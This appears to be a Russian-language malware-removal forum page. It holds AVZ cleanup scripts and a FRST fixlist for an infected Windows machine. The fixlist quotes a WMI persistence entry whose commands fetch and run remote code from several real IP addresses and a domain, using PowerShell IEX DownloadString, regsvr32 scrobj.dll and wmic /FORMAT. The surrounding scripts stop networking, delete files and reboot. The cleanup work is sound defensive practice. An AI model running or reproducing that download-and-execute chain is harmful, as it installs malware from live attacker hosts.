Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('c:\windows\inf\aspnet\lsma.exe','');
DeleteFile('c:\windows\inf\aspnet\lsma.exe','64');
DeleteSchedulerTask('oka');
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://80.85.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://80.85.158.117:8117/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Start::
CreateRestorePoint:
VirusTotal: C:\Windows\system32\n1.dat;C:\Windows\system32\n.dat;
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2843635995-2632599509-2577391226-1000\...\Run: [] => [X]
Task: {A847B2E6-1017-45F7-9E6A-E6D6E7010A41} - \Mysa2 -> No File <==== ATTENTION
Task: {BF753883-F886-4E0A-AD0D-7D03B675FEFC} - \Mysa -> No File <==== ATTENTION
Task: {D5006E2D-B874-42BC-95A4-E7C1DEB29859} - \Mysa3 -> No File <==== ATTENTION
FF ProfilePath: C:\Users\Юservice\AppData\Roaming\Mozilla\Firefox\Profiles\vyu7k7yd.default-1426025487454 [not found] <==== ATTENTION
FF ProfilePath: C:\ProgramData\Kaspersky Lab\SafeBrowser\S-1-5-21-3591597119-369042605-4045123810-1000\FireFox [not found] <==== ATTENTION
FF ProfilePath: C:\Users\Юservice\AppData\Roaming\Mozilla\Firefox\Profiles\zambwcgc.default-release [not found] <==== ATTENTION
2019-10-16 16:01 - 2019-11-03 18:01 - 000000081 _____ C:\Windows\system32\s
2019-10-16 16:01 - 2019-11-03 18:01 - 000000079 _____ C:\Windows\system32\ps
2019-10-16 16:01 - 2019-11-03 18:01 - 000000077 _____ C:\Windows\system32\p
FirewallRules: [{4E964037-929A-4A07-A560-01ADED0F2CFC}] => (Allow) C:\Users\Юservice\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
FirewallRules: [{2B681B90-8DAE-43BB-9C75-89A5AAE016DA}] => (Allow) C:\Program Files (x86)\DriverPack Cloud\cloud.exe No File
EmptyTemp:
Reboot:
End::